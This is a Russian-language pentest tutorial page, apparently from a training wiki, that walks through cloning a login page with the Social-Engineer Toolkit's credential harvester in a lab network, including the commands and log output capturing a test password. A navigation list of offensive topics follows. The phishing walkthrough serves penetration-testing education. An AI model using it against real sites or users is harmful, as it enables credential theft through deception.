Клонирование сайта

Запуск SET

sudo setoolkit

Будет предложено указать IP адрес, на котором будет http шлюз. Т е тот сервер, к которому будет организовано подключение и которое будет отображать типа-фэйковый-сайт. Здесь адрес на интерфейсе Kali 192.168.1.15. Этот пункт добавлен в связи с несколькими возможными интерфейсами в системе.

set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.1.15]:

Далее вводим адрес копируемой страницы. В данном случае это 192.168.1.89

[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone: https://192.168.1.89/auth

[*] Cloning the website: https://192.168.1.89/auth
[*] This could take a little bit...

The best way to use this attack is if username and password form fields are available...
[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80                                                                                             
[*] Information will be displayed to you as it arrives below:

Теперь https страничка сайта 192.168.1.89/auth размещена на http 192.168.1.15. При обращении будет отображено

192.168.1.15 - - [08/Oct/2025 04:11:31] "GET / HTTP/1.1" 200 -
192.168.1.15 - - [08/Oct/2025 04:11:32] "GET /favicon.ico HTTP/1.1" 404 -
192.168.1.15 - - [08/Oct/2025 04:11:44] "GET / HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
POSSIBLE USERNAME FIELD FOUND: username=test                                                                                                                                                                                            
POSSIBLE PASSWORD FIELD FOUND: password=gtrokl                                                                                                                                                                                              
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.

Пользователь после этого будет тихо перенаправлен на настоящую страничку, а в логах будет отражен введенный логин и пароль.

Общее описание

A01:2021 – Broken Access Control

Общие требования

Система хранения информации

Структура информации при пентесте

Поиск хостов и открытых портов

Поиск доменных имен

OSINT

Shodan.io, Google

Email рассылки

Фаззинг

Направления

Тестовые стенды

Уязвимости механизмов авторизации

Уязвимости инъекции команд ОС

Уязвимости контроля доступа

Файлы и каталоги

SQL-инъекции

Внедрение внешних сущностей XML

Межсайтовый скриптинг (XSS)

Burp

Nikto, nuclei и др.

HTTP request smuggling

Общая информация

Тестовый стенд

Версия сервиса и ОС

NMAP

NMAP Script Engine (NSE)

SMB VNC SMTP

Прослушивание паролей

Общая информация

Управление данными

Exploits

Payloads

Meterpreter

Автоматизация MSF

Общая идея

Пример атаки

Поиск email

setoolkit

Клонирование сайта

Общая информация и практика

Получение легитимного доступа

Внесение изменений в легитимные механизмы доступа

Внесение изменений в сервисы и внешние программы в ОС

Внесение изменений в ядро ОС и в предустановленные службы на нем

Внедрение бэкдоров аутентификации на основе PAM

Общая информация

Пример nmap

Эксплуатация ошибок администрирования ОС Linux

Практика

Общая информация

Примеры атак

Проброс сетевого трафика

Утилиты для проброса трафика

Использование внешних утилит для скрытия трафика

Практика проброса трафика

Общая информация

Поиск Win машин и эксплуатация Smb уязвимости

Обнаружение Windows машин

Атаки первичного доступа

Повышение привилегий

Практика первичного доступа

Практика повышения привилегий

Общая информация

Пример захвата управления

Уязвимости

Сбор информации об объектах

Миссконфигурация сервисов в AD

Практика

Общая информация

Подготовка и сравнение нагрузок

Увеличение скрытности

Ротация IP

Материалы

Общая информация

Инфраструктура

SIEM (ElasticSearch)

Системы аудита и внешний периметр

Email и облака